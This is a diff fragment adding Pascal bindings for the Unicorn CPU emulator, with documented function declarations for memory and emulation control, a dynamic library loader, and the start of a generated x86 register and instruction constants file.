function(uc : uc_engine; regs : PIntegerArray; var values : Pointer; count : integer) : uc_err; cdecl; + +(* + Write to a range of bytes in memory. + + @uc: handle returned by uc_open() + @address: starting memory address of bytes to set. + @bytes: pointer to a variable containing data to be written to memory. + @size: size of memory to write to. + + NOTE: @bytes must be big enough to contain @size bytes. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). +*) + uc_mem_write_ : function (uc : uc_engine; address : UInt64; const bytes : Pointer; + size : Cardinal) : uc_err; cdecl; + +(* + Read a range of bytes in memory. + + @uc: handle returned by uc_open() + @address: starting memory address of bytes to get. + @bytes: pointer to a variable containing data copied from memory. + @size: size of memory to read. + + NOTE: @bytes must be big enough to contain @size bytes. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_mem_read_ : function (uc : uc_engine; address : UInt64; bytes : Pointer; + size : Cardinal) : uc_err; cdecl; + +(* + Emulate machine code in a specific duration of time. + + @uc: handle returned by uc_open() + @begin: address where emulation starts + @until: address where emulation stops (i.e when this address is hit) + @timeout: duration to emulate the code (in microseconds). When this value is 0, + we will emulate the code in infinite time, until the code is finished. + @count: the number of instructions to be emulated. When this value is 0, + we will emulate all the code available, until the code is finished. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_emu_start : function (uc : uc_engine; _begin, _until , timeout : UInt64; + count : Cardinal) : uc_err; cdecl; + +(* + Stop emulation (which was started by uc_emu_start() API. + This is typically called from callback functions registered via tracing APIs. + NOTE: for now, this will stop the execution only after the current block. + + @uc: handle returned by uc_open() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_emu_stop : function (uc : uc_engine) : uc_err; cdecl; + +(* +function (uc : uc_engine; var hh : uc_hook; _type : integer; + callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; args : Array Of Const) : uc_err; cdecl; + +Register callback for a hook event. +The callback will be run when the hook event is hit. + +@uc: handle returned by uc_open() +@hh: hook handle returned from this registration. To be used in uc_hook_del() API +@type: hook type +@callback: callback to be run when instruction is hit +@user_data: user-defined data. This will be passed to callback function in its + last argument @user_data +@begin: start address of the area where the callback is effect (inclusive) +@end: end address of the area where the callback is effect (inclusive) + NOTE 1: the callback is called only if related address is in range [@begin, @end] + NOTE 2: if @begin > @end, callback is called whenever this hook type is triggered +@...: variable arguments (depending on @type) + NOTE: if @type = UC_HOOK_INSN, this is the instruction ID (ex: UC_X86_INS_OUT) + +@return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_hook_add : function (uc : uc_engine; var hh : uc_hook; _type : integer; + callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; args : Array Of Const) : uc_err; cdecl; + + //uc_hook_add_1 : function (uc : uc_engine; var hh : uc_hook; _type : integer; + // callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; arg1 : integer) : uc_err; cdecl; + // + //uc_hook_add_2 : function (uc : uc_engine; var hh : uc_hook; _type : integer; + // callback : Pointer; user_data : Pointer; _Begin, _End : UInt64; arg1, arg2 : UInt64) : uc_err; cdecl; + // +(* + Unregister (remove) a hook callback. + This API removes the hook callback registered by uc_hook_add(). + NOTE: this should be called only when you no longer want to trace. + After this, @hh is invalid, and nolonger usable. + + @uc: handle returned by uc_open() + @hh: handle returned by uc_hook_add() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). +*) + uc_hook_del : function (uc : uc_engine; hh : uc_hook) : uc_err; cdecl ; + +(* + Map memory in for emulation. + This API adds a memory region that can be used by emulation. + + @uc: handle returned by uc_open() + @address: starting address of the new memory region to be mapped in. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the new memory region to be mapped in. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: Permissions for the newly mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_mem_map : function (uc : uc_engine; address : UInt64; size : Cardinal; perms : UInt32) : uc_err; cdecl; + + +(* + Map existing host memory in for emulation. + This API adds a memory region that can be used by emulation. + + @uc: handle returned by uc_open() + @address: starting address of the new memory region to be mapped in. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the new memory region to be mapped in. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: Permissions for the newly mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + @ptr: pointer to host memory backing the newly mapped memory. This host memory is + expected to be an equal or larger size than provided, and be mapped with at + least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_mem_map_ptr : function(uc : uc_engine; address : UInt64; size : Cardinal; perms : UInt32; ptr : Pointer) : uc_err; cdecl; + + +(* + Unmap a region of emulation memory. + This API deletes a memory mapping from the emulation memory space. + + @handle: handle returned by uc_open() + @address: starting address of the memory region to be unmapped. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the memory region to be modified. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). +*) + uc_mem_unmap : function (uc : uc_engine; address : UInt64; size : Cardinal) : uc_err; cdecl ; + +(* + Set memory permissions for emulation memory. + This API changes permissions on an existing memory region. + + @handle: handle returned by uc_open() + @address: starting address of the memory region to be modified. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the memory region to be modified. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: New permissions for the mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). +*) + uc_mem_protect : function (uc : uc_engine; address : UInt64; size : Cardinal; perms : UInt32) : uc_err; cdecl ; + +(* + Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr() + This API allocates memory for @regions, and user must free this memory later + by free() to avoid leaking memory. + NOTE: memory regions may be splitted by uc_mem_unmap() + + @uc: handle returned by uc_open() + @regions: pointer to an array of uc_mem_region struct. >> Check "Puc_mem_regionArray" + This is allocated by Unicorn, and must be freed by user later. + @count: pointer to number of struct uc_mem_region contained in @regions + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_mem_regions : function(uc : uc_engine; var regions : Puc_mem_regionArray; count : PUInt32) : uc_err; cdecl ; + +(* + Allocate a region that can be used with uc_context_{save,restore} to perform + quick save/rollback of the CPU context, which includes registers and some + internal metadata. Contexts may not be shared across engine instances with + differing arches or modes. + + @uc: handle returned by uc_open() + @context: pointer to a uc_engine*. This will be updated with the pointer to + the new context on successful return of this function. + Later, this allocated memory must be freed with uc_free(). + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*) + uc_context_alloc : function ( uc : uc_engine; var context : uc_context) : uc_err; cdecl ; + +(* + Free the memory allocated by uc_context_alloc & uc_mem_regions. + + @mem: memory allocated by uc_context_alloc (returned in *context), or + by uc_mem_regions (returned in *regions) + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). +*) + uc_free : function (context : Pointer) : uc_err; cdecl ; + + +(* + Save a copy of the internal CPU context. + This API should be used to efficiently make or update a saved copy of the + internal CPU state. + + @uc: handle returned by uc_open() + @context: handle returned by uc_context_alloc() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). +*) + uc_context_save : function ( uc : uc_engine; context : uc_context) : uc_err; cdecl; + +(* + Restore the current CPU context from a saved copy. + This API should be used to roll the CPU context back to a previous + state saved by uc_context_save(). + + @uc: handle returned by uc_open() + @context: handle returned by uc_context_alloc that has been used with uc_context_save + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum \ + for detailed error). +*) + uc_context_restore : function(uc : uc_engine; context : uc_context) : uc_err; cdecl; + + +{============================= Global Functions ================================} + +// function uc_hook_add(uc : uc_engine; var hh : uc_hook; _type : integer; +// callback : Pointer; user_data : Pointer; mBegin, mEnd : UInt64) : uc_err; overload; + //function uc_hook_add(uc : uc_engine; var hh : uc_hook; _type : integer; + // callback : Pointer; user_data : Pointer; mBegin, mEnd , arg1 : UInt64) : uc_err; overload; + //function uc_hook_add(uc : uc_engine; var hh : uc_hook; _type : integer; + // callback : Pointer; user_data : Pointer; mBegin, mEnd , arg1, arg2 : UInt64) : uc_err; overload; + // + + function UC_MAKE_VERSION(major,minor : Cardinal): Cardinal; + +implementation + +function UC_MAKE_VERSION(major,minor : Cardinal): Cardinal; +begin + Result := ((major shl 8) + minor); +end; + +var + UC_Handle : {$IFDEF FPC}dynlibs.{$ENDIF}HModule; + +function dyn_loadfunc(name : {$IFDEF FPC}string{$ELSE}PChar{$ENDIF}) : Pointer; +begin + Result := {$IFDEF FPC}dynlibs.{$ENDIF}GetProcAddress(UC_Handle,name); +end; + +function loadUC(): Boolean; +var + LastError : String; +begin + Result := false; + UC_Handle := {$IFDEF FPC}dynlibs.{$ENDIF}LoadLibrary(UNICORN_LIB); + if UC_Handle <> 0 then + begin + @uc_version := dyn_loadfunc('uc_version'); + if (@uc_version = nil) then exit(false); + + @uc_arch_supported := dyn_loadfunc('uc_arch_supported'); + if (@uc_arch_supported = nil) then exit(false); + + @uc_open := dyn_loadfunc('uc_open'); + if (@uc_open = nil) then exit(false); + + @uc_close := dyn_loadfunc('uc_close'); + if (@uc_close = nil) then exit(false); + + @uc_query := dyn_loadfunc('uc_query'); + if (@uc_query = nil) then exit(false); + + @uc_errno := dyn_loadfunc('uc_errno'); + if (@uc_errno = nil) then exit(false); + + @uc_strerror := dyn_loadfunc('uc_strerror'); + if (@uc_strerror = nil) then exit(false); + + @uc_reg_write := dyn_loadfunc('uc_reg_write'); + if (@uc_reg_write = nil) then exit(false); + + @uc_reg_read := dyn_loadfunc('uc_reg_read'); + if (@uc_reg_read = nil) then exit(false); + + @uc_reg_write_batch := dyn_loadfunc('uc_reg_write_batch'); + if (@uc_reg_write_batch = nil) then exit(false); + + @uc_reg_read_batch := dyn_loadfunc('uc_reg_read_batch'); + if (@uc_reg_read_batch = nil) then exit(false); + + @uc_mem_write_ := dyn_loadfunc('uc_mem_write'); + if (@uc_mem_write_ = nil) then exit(false); + + @uc_mem_read_ := dyn_loadfunc('uc_mem_read'); + if (@uc_mem_read_ = nil) then exit(false); + + @uc_emu_start := dyn_loadfunc('uc_emu_start'); + if (@uc_emu_start = nil) then exit(false); + + @uc_emu_stop := dyn_loadfunc('uc_emu_stop'); + if (@uc_emu_stop = nil) then exit(false); + + @uc_hook_add := dyn_loadfunc('uc_hook_add'); + if (@uc_hook_add = nil) then exit(false); + + @uc_hook_del := dyn_loadfunc('uc_hook_del'); + if (@uc_hook_del = nil) then exit(false); + + @uc_mem_map := dyn_loadfunc('uc_mem_map'); + if (@uc_mem_map = nil) then exit(false); + + @uc_mem_map_ptr := dyn_loadfunc('uc_mem_map_ptr'); + if (@uc_mem_map_ptr = nil) then exit(false); + + @uc_mem_unmap := dyn_loadfunc('uc_mem_unmap'); + if (@uc_mem_unmap = nil) then exit(false); + + @uc_mem_protect := dyn_loadfunc('uc_mem_protect'); + if (@uc_mem_protect = nil) then exit(false); + + @uc_mem_regions := dyn_loadfunc('uc_mem_regions'); + if (@uc_mem_regions = nil) then exit(false); + + @uc_context_alloc := dyn_loadfunc('uc_context_alloc'); + if (@uc_context_alloc = nil) then exit(false); + + @uc_context_save := dyn_loadfunc('uc_context_save'); + if (@uc_context_save = nil) then exit(false); + + @uc_context_restore := dyn_loadfunc('uc_context_restore'); + if (@uc_context_restore = nil) then exit(false); + + @uc_free := dyn_loadfunc('uc_free'); + if (@uc_free = nil) then exit(false); + + Result := true; + end + else + begin + {$IFDEF FPC}TextColor(LightRed);{$ENDIF} + LastError := {$IFDEF FPC}GetLoadErrorStr;{$ELSE} + {$ifdef mswindows} + SysErrorMessage(GetLastError,UC_Handle); + SetLastError(0); + {$ENDIF} + {$ENDIF} + WriteLn('error while loading unicorn library : ',LastError,#10); + {$IFDEF FPC}NormVideo;{$ENDIF} + end; +end; + +procedure FreeUC(); +begin + if UC_Handle <> 0 then + {$IFDEF FPC}dynlibs.{$ENDIF}FreeLibrary(UC_Handle); +end; + +initialization + UC_Handle := 0; + if not loadUC then halt(0); + +finalization + FreeUC(); +end. diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/X86Const.pas b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/X86Const.pas new file mode 100644 index 0000000..27994b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/unicorn/X86Const.pas @@ -0,0 +1,1607 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +unit X86Const; + +interface + +const +// X86 registers + + UC_X86_REG_INVALID = 0; + UC_X86_REG_AH = 1; + UC_X86_REG_AL = 2; + UC_X86_REG_AX = 3; + UC_X86_REG_BH = 4; + UC_X86_REG_BL = 5; + UC_X86_REG_BP = 6; + UC_X86_REG_BPL = 7; + UC_X86_REG_BX = 8; + UC_X86_REG_CH = 9; + UC_X86_REG_CL = 10; + UC_X86_REG_CS = 11; + UC_X86_REG_CX = 12; + UC_X86_REG_DH = 13; + UC_X86_REG_DI = 14; + UC_X86_REG_DIL = 15; + UC_X86_REG_DL = 16; + UC_X86_REG_DS = 17; + UC_X86_REG_DX = 18; + UC_X86_REG_EAX = 19; + UC_X86_REG_EBP = 20; + UC_X86_REG_EBX = 21; + UC_X86_REG_ECX = 22; + UC_X86_REG_EDI = 23; + UC_X86_REG_EDX = 24; + UC_X86_REG_EFLAGS = 25; + UC_X86_REG_EIP = 26; + UC_X86_REG_EIZ = 27; + UC_X86_REG_ES = 28; + UC_X86_REG_ESI = 29; + UC_X86_REG_ESP = 30; + UC_X86_REG_FPSW = 31; + UC_X86_REG_FS = 32; + UC_X86_REG_GS = 33; + UC_X86_REG_IP = 34; + UC_X86_REG_RAX = 35; + UC_X86_REG_RBP = 36; + UC_X86_REG_RBX = 37; + UC_X86_REG_RCX = 38; + UC_X86_REG_RDI = 39; + UC_X86_REG_RDX = 40; + UC_X86_REG_RIP = 41; + UC_X86_REG_RIZ = 42; + UC_X86_REG_RSI = 43; + UC_X86_REG_RSP = 44; + UC_X86_REG_SI = 45; + UC_X86_REG_SIL = 46; + UC_X86_REG_SP = 47; + UC_X86_REG_SPL = 48; + UC_X86_REG_SS = 49; + UC_X86_REG_CR0 = 50; + UC_X86_REG_CR1 = 51; + UC_X86_REG_CR2 = 52; + UC_X86_REG_CR3 = 53; + UC_X86_REG_CR4 = 54; + UC_X86_REG_CR5 = 55; + UC_X86_REG_CR6 = 56; + UC_X86_REG_CR7 = 57; + UC_X86_REG_CR8 = 58; + UC_X86_REG_CR9 = 59; + UC_X86_REG_CR10 = 60; + UC_X86_REG_CR11 = 61; + UC_X86_REG_CR12 = 62; + UC_X86_REG_CR13 = 63; + UC_X86_REG_CR14 = 64; + UC_X86_REG_CR15 = 65; + UC_X86_REG_DR0 = 66; + UC_X86_REG_DR1 = 67; + UC_X86_REG_DR2 = 68; + UC_X86_REG_DR3 = 69; + UC_X86_REG_DR4 = 70; + UC_X86_REG_DR5 = 71; + UC_X86_REG_DR6 = 72; + UC_X86_REG_DR7 = 73; + UC_X86_REG_DR8 = 74; + UC_X86_REG_DR9 = 75; + UC_X86_REG_DR10 = 76; + UC_X86_REG_DR11 = 77; + UC_X86_REG_DR12 = 78; + UC_X86_REG_DR13 = 79; + UC_X86_REG_DR14 = 80; + UC_X86_REG_DR15 = 81; + UC_X86_REG_FP0 = 82; + UC_X86_REG_FP1 = 83; + UC_X86_REG_FP2 = 84; + UC_X86_REG_FP3 = 85; + UC_X86_REG_FP4 = 86; + UC_X86_REG_FP5 = 87; + UC_X86_REG_FP6 = 88; + UC_X86_REG_FP7 = 89; + UC_X86_REG_K0 = 90; + UC_X86_REG_K1 = 91; + UC_X86_REG_K2 = 92; + UC_X86_REG_K3 = 93; + UC_X86_REG_K4 = 94; + UC_X86_REG_K5 = 95; + UC_X86_REG_K6 = 96; + UC_X86_REG_K7 = 97; + UC_X86_REG_MM0 = 98; + UC_X86_REG_MM1 = 99; + UC_X86_REG_MM2 = 100; + UC_X86_REG_MM3 = 101; + UC_X86_REG_MM4 = 102; + UC_X86_REG_MM5 = 103; + UC_X86_REG_MM6 = 104; + UC_X86_REG_MM7 = 105; + UC_X86_REG_R8 = 106; + UC_X86_REG_R9 = 107; + UC_X86_REG_R10 = 108; + UC_X86_REG_R11 = 109; + UC_X86_REG_R12 = 110; + UC_X86_REG_R13 = 111; + UC_X86_REG_R14 = 112; + UC_X86_REG_R15 = 113; + UC_X86_REG_ST0 = 114; + UC_X86_REG_ST1 = 115; + UC_X86_REG_ST2 = 116; + UC_X86_REG_ST3 = 117; + UC_X86_REG_ST4 = 118; + UC_X86_REG_ST5 = 119; + UC_X86_REG_ST6 = 120; + UC_X86_REG_ST7 = 121; + UC_X86_REG_XMM0 = 122; + UC_X86_REG_XMM1 = 123; + UC_X86_REG_XMM2 = 124; + UC_X86_REG_XMM3 = 125; + UC_X86_REG_XMM4 = 126; + UC_X86_REG_XMM5 = 127; + UC_X86_REG_XMM6 = 128; + UC_X86_REG_XMM7 = 129; + UC_X86_REG_XMM8 = 130; + UC_X86_REG_XMM9 = 131; + UC_X86_REG_XMM10 = 132; + UC_X86_REG_XMM11 = 133; + UC_X86_REG_XMM12 = 134; + UC_X86_REG_XMM13 = 135; + UC_X86_REG_XMM14 = 136; + UC_X86_REG_XMM15 = 137; + UC_X86_REG_XMM16 = 138; + UC_X86_REG_XMM17 = 139; + UC_X86_REG_XMM18 = 140; + UC_X86_REG_XMM19 = 141; + UC_X86_REG_XMM20 = 142; + UC_X86_REG_XMM21 = 143; + UC_X86_REG_XMM22 = 144; + UC_X86_REG_XMM23 = 145; + UC_X86_REG_XMM24 = 146; + UC_X86_REG_XMM25 = 147; + UC_X86_REG_XMM26 = 148; + UC_X86_REG_XMM27 = 149; + UC_X86_REG_XMM28 = 150; + UC_X86_REG_XMM29 = 151; + UC_X86_REG_XMM30 = 152; + UC_X86_REG_XMM31 = 153; + UC_X86_REG_YMM0 = 154; + UC_X86_REG_YMM1 = 155; + UC_X86_REG_YMM2 = 156; + UC_X86_REG_YMM3 = 157; + UC_X86_REG_YMM4 = 158; + UC_X86_REG_YMM5 = 159; + UC_X86_REG_YMM6 = 160; + UC_X86_REG_YMM7 = 161; + UC_X86_REG_YMM8 = 162; + UC_X86_REG_YMM9 = 163; + UC_X86_REG_YMM10 = 164; + UC_X86_REG_YMM11 = 165; + UC_X86_REG_YMM12 = 166; + UC_X86_REG_YMM13 = 167; + UC_X86_REG_YMM14 = 168; + UC_X86_REG_YMM15 = 169; + UC_X86_REG_YMM16 = 170; + UC_X86_REG_YMM17 = 171; + UC_X86_REG_YMM18 = 172; + UC_X86_REG_YMM19 = 173; + UC_X86_REG_YMM20 = 174; + UC_X86_REG_YMM21 = 175; + UC_X86_REG_YMM22 = 176; + UC_X86_REG_YMM23 = 177; + UC_X86_REG_YMM24 = 178; + UC_X86_REG_YMM25 = 179; + UC_X86_REG_YMM26 = 180; + UC_X86_REG_YMM27 = 181; + UC_X86_REG_YMM28 = 182; + UC_X86_REG_YMM29 = 183; + UC_X86_REG_YMM30 = 184; + UC_X86_REG_YMM31 = 185; + UC_X86_REG_ZMM0 = 186; + UC_X86_REG_ZMM1 = 187; + UC_X86_REG_ZMM2 = 188; + UC_X86_REG_ZMM3 = 189; + UC_X86_REG_ZMM4 = 190; + UC_X86_REG_ZMM5 = 191; + UC_X86_REG_ZMM6 = 192; + UC_X86_REG_ZMM7 = 193; + UC_X86_REG_ZMM8 = 194; + UC_X86_REG_ZMM9 = 195; + UC_X86_REG_ZMM10 = 196; + UC_X86_REG_ZMM11 = 197; + UC_X86_REG_ZMM12 = 198; + UC_X86_REG_ZMM13 = 199; + UC_X86_REG_ZMM14 = 200; + UC_X86_REG_ZMM15 = 201; + UC_X86_REG_ZMM16 = 202; + UC_X86_REG_ZMM17 = 203; + UC_X86_REG_ZMM18 = 204; + UC_X86_REG_ZMM19 = 205; + UC_X86_REG_ZMM20 = 206; + UC_X86_REG_ZMM21 = 207; + UC_X86_REG_ZMM22 = 208; + UC_X86_REG_ZMM23 = 209; + UC_X86_REG_ZMM24 = 210; + UC_X86_REG_ZMM25 = 211; + UC_X86_REG_ZMM26 = 212; + UC_X86_REG_ZMM27 = 213; + UC_X86_REG_ZMM28 = 214; + UC_X86_REG_ZMM29 = 215; + UC_X86_REG_ZMM30 = 216; + UC_X86_REG_ZMM31 = 217; + UC_X86_REG_R8B = 218; + UC_X86_REG_R9B = 219; + UC_X86_REG_R10B = 220; + UC_X86_REG_R11B = 221; + UC_X86_REG_R12B = 222; + UC_X86_REG_R13B = 223; + UC_X86_REG_R14B = 224; + UC_X86_REG_R15B = 225; + UC_X86_REG_R8D = 226; + UC_X86_REG_R9D = 227; + UC_X86_REG_R10D = 228; + UC_X86_REG_R11D = 229; + UC_X86_REG_R12D = 230; + UC_X86_REG_R13D = 231; + UC_X86_REG_R14D = 232; + UC_X86_REG_R15D = 233; + UC_X86_REG_R8W = 234; + UC_X86_REG_R9W = 235; + UC_X86_REG_R10W = 236; + UC_X86_REG_R11W = 237; + UC_X86_REG_R12W = 238; + UC_X86_REG_R13W = 239; + UC_X86_REG_R14W = 240; + UC_X86_REG_R15W = 241; + UC_X86_REG_IDTR = 242; + UC_X86_REG_GDTR = 243; + UC_X86_REG_LDTR = 244; + UC_X86_REG_TR = 245; + UC_X86_REG_FPCW = 246; + UC_X86_REG_FPTAG = 247; + UC_X86_REG_MSR = 248; + UC_X86_REG_MXCSR = 249; + UC_X86_REG_FS_BASE = 250; + UC_X86_REG_GS_BASE = 251; + UC_X86_REG_ENDING = 252; + +// X86 instructions + + UC_X86_INS_INVALID = 0; + UC_X86_INS_AAA = 1; + UC_X86_INS_AAD = 2; + UC_X86_INS_AAM = 3; + UC_X86_INS_AAS = 4; + UC_X86_INS_FABS = 5; + UC_X86_INS_ADC = 6; + UC_X86_INS_ADCX = 7; + UC_X86_INS_ADD = 8; + UC_X86_INS_ADDPD = 9; + UC_X86_INS_ADDPS = 10; + UC_X86_INS_ADDSD = 11; + UC_X86_INS_ADDSS = 12; + UC_X86_INS_ADDSUBPD = 13; + UC_X86_INS_ADDSUBPS = 14; + UC_X86_INS_FADD = 15; + UC_X86_INS_FIADD = 16; + UC_X86_INS_FADDP = 17; + UC_X86_INS_ADOX = 18; + UC_X86_INS_AESDECLAST = 19; + UC_X86_INS_AESDEC = 20; + UC_X86_INS_AESENCLAST = 21; + UC_X86_INS_AESENC = 22; + UC_X86_INS_AESIMC = 23; + UC_X86_INS_AESKEYGENASSIST = 24; + UC_X86_INS_AND = 25; + UC_X86_INS_ANDN = 26; + UC_X86_INS_ANDNPD = 27; + UC_X86_INS_ANDNPS = 28; + UC_X86_INS_ANDPD = 29; + UC_X86_INS_ANDPS = 30; + UC_X86_INS_ARPL = 31; + UC_X86_INS_BEXTR = 32; + UC_X86_INS_BLCFILL = 33; + UC_X86_INS_BLCI = 34; + UC_X86_INS_BLCIC = 35; + UC_X86_INS_BLCMSK = 36; + UC_X86_INS_BLCS = 37; + UC_X86_INS_BLENDPD = 38; + UC_X86_INS_BLENDPS = 39; + UC_X86_INS_BLENDVPD = 40; + UC_X86_INS_BLENDVPS = 41; + UC_X86_INS_BLSFILL = 42; + UC_X86_INS_BLSI = 43; + UC_X86_INS_BLSIC = 44; + UC_X86_INS_BLSMSK = 45; + UC_X86_INS_BLSR = 46; + UC_X86_INS_BOUND = 47; + UC_X86_INS_BSF = 48; + UC_X86_INS_BSR = 49; + UC_X86_INS_BSWAP = 50; + UC_X86_INS_BT = 51; + UC_X86_INS_BTC = 52; + UC_X86_INS_BTR = 53; + UC_X86_INS_BTS = 54; + UC_X86_INS_BZHI = 55; + UC_X86_INS_CALL = 56; + UC_X86_INS_CBW = 57; + UC_X86_INS_CDQ = 58; + UC_X86_INS_CDQE = 59; + UC_X86_INS_FCHS = 60; + UC_X86_INS_CLAC = 61; + UC_X86_INS_CLC = 62; + UC_X86_INS_CLD = 63; + UC_X86_INS_CLFLUSH = 64; + UC_X86_INS_CLFLUSHOPT = 65; + UC_X86_INS_CLGI = 66; + UC_X86_INS_CLI = 67; + UC_X86_INS_CLTS = 68; + UC_X86_INS_CLWB = 69; + UC_X86_INS_CMC = 70; + UC_X86_INS_CMOVA = 71; + UC_X86_INS_CMOVAE = 72; + UC_X86_INS_CMOVB = 73; + UC_X86_INS_CMOVBE = 74; + UC_X86_INS_FCMOVBE = 75; + UC_X86_INS_FCMOVB = 76; + UC_X86_INS_CMOVE = 77; + UC_X86_INS_FCMOVE = 78; + UC_X86_INS_CMOVG = 79; + UC_X86_INS_CMOVGE = 80; + UC_X86_INS_CMOVL = 81; + UC_X86_INS_CMOVLE = 82; + UC_X86_INS_FCMOVNBE = 83; + UC_X86_INS_FCMOVNB = 84; + UC_X86_INS_CMOVNE = 85; + UC_X86_INS_FCMOVNE = 86; + UC_X86_INS_CMOVNO = 87; + UC_X86_INS_CMOVNP = 88; + UC_X86_INS_FCMOVNU = 89; + UC_X86_INS_CMOVNS = 90; + UC_X86_INS_CMOVO = 91; + UC_X86_INS_CMOVP = 92; + UC_X86_INS_FCMOVU = 93; + UC_X86_INS_CMOVS = 94; + UC_X86_INS_CMP = 95; + UC_X86_INS_CMPPD = 96; + UC_X86_INS_CMPPS = 97; + UC_X86_INS_CMPSB = 98; + UC_X86_INS_CMPSD = 99; + UC_X86_INS_CMPSQ = 100; + UC_X86_INS_CMPSS = 101; + UC_X86_INS_CMPSW = 102; + UC_X86_INS_CMPXCHG16B = 103; + UC_X86_INS_CMPXCHG = 104; + UC_X86_INS_CMPXCHG8B = 105; + UC_X86_INS_COMISD = 106; + UC_X86_INS_COMISS = 107; + UC_X86_INS_FCOMP = 108; + UC_X86_INS_FCOMPI = 109; + UC_X86_INS_FCOMI = 110; + UC_X86_INS_FCOM = 111; + UC_X86_INS_FCOS = 112; + UC_X86_INS_CPUID = 113; + UC_X86_INS_CQO = 114; + UC_X86_INS_CRC32 = 115; + UC_X86_INS_CVTDQ2PD = 116; + UC_X86_INS_CVTDQ2PS = 117; + UC_X86_INS_CVTPD2DQ = 118; + UC_X86_INS_CVTPD2PS = 119; + UC_X86_INS_CVTPS2DQ = 120; + UC_X86_INS_CVTPS2PD = 121; + UC_X86_INS_CVTSD2SI = 122; + UC_X86_INS_CVTSD2SS = 123; + UC_X86_INS_CVTSI2SD = 124; + UC_X86_INS_CVTSI2SS = 125; + UC_X86_INS_CVTSS2SD = 126; + UC_X86_INS_CVTSS2SI = 127; + UC_X86_INS_CVTTPD2DQ = 128; + UC_X86_INS_CVTTPS2DQ = 129; + UC_X86_INS_CVTTSD2SI = 130; + UC_X86_INS_CVTTSS2SI = 131; + UC_X86_INS_CWD = 132; + UC_X86_INS_CWDE = 133; + UC_X86_INS_DAA = 134; + UC_X86_INS_DAS = 135; + UC_X86_INS_DATA16 = 136; + UC_X86_INS_DEC = 137; + UC_X86_INS_DIV = 138; + UC_X86_INS_DIVPD = 139; + UC_X86_INS_DIVPS = 140; + UC_X86_INS_FDIVR = 141; + UC_X86_INS_FIDIVR = 142; + UC_X86_INS_FDIVRP = 143; + UC_X86_INS_DIVSD = 144; + UC_X86_INS_DIVSS = 145; + UC_X86_INS_FDIV = 146; + UC_X86_INS_FIDIV = 147; + UC_X86_INS_FDIVP = 148; + UC_X86_INS_DPPD = 149; + UC_X86_INS_DPPS = 150; + UC_X86_INS_RET = 151; + UC_X86_INS_ENCLS = 152; + UC_X86_INS_ENCLU = 153; + UC_X86_INS_ENTER = 154; + UC_X86_INS_EXTRACTPS = 155; + UC_X86_INS_EXTRQ = 156; + UC_X86_INS_F2XM1 = 157; + UC_X86_INS_LCALL = 158; + UC_X86_INS_LJMP = 159; + UC_X86_INS_FBLD = 160; + UC_X86_INS_FBSTP = 161; + UC_X86_INS_FCOMPP = 162; + UC_X86_INS_FDECSTP = 163; + UC_X86_INS_FEMMS = 164; + UC_X86_INS_FFREE = 165; + UC_X86_INS_FICOM = 166; + UC_X86_INS_FICOMP = 167; + UC_X86_INS_FINCSTP = 168; + UC_X86_INS_FLDCW = 169; + UC_X86_INS_FLDENV = 170; + UC_X86_INS_FLDL2E = 171; + UC_X86_INS_FLDL2T = 172; + UC_X86_INS_FLDLG2 = 173; + UC_X86_INS_FLDLN2 = 174; + UC_X86_INS_FLDPI = 175; + UC_X86_INS_FNCLEX = 176; + UC_X86_INS_FNINIT = 177; + UC_X86_INS_FNOP = 178; + UC_X86_INS_FNSTCW = 179; + UC_X86_INS_FNSTSW = 180; + UC_X86_INS_FPATAN = 181; + UC_X86_INS_FPREM = 182; + UC_X86_INS_FPREM1 = 183; + UC_X86_INS_FPTAN = 184; + UC_X86_INS_FFREEP = 185; + UC_X86_INS_FRNDINT = 186; + UC_X86_INS_FRSTOR = 187; + UC_X86_INS_FNSAVE = 188; + UC_X86_INS_FSCALE = 189; + UC_X86_INS_FSETPM = 190; + UC_X86_INS_FSINCOS = 191; + UC_X86_INS_FNSTENV = 192; + UC_X86_INS_FXAM = 193; + UC_X86_INS_FXRSTOR = 194; + UC_X86_INS_FXRSTOR64 = 195; + 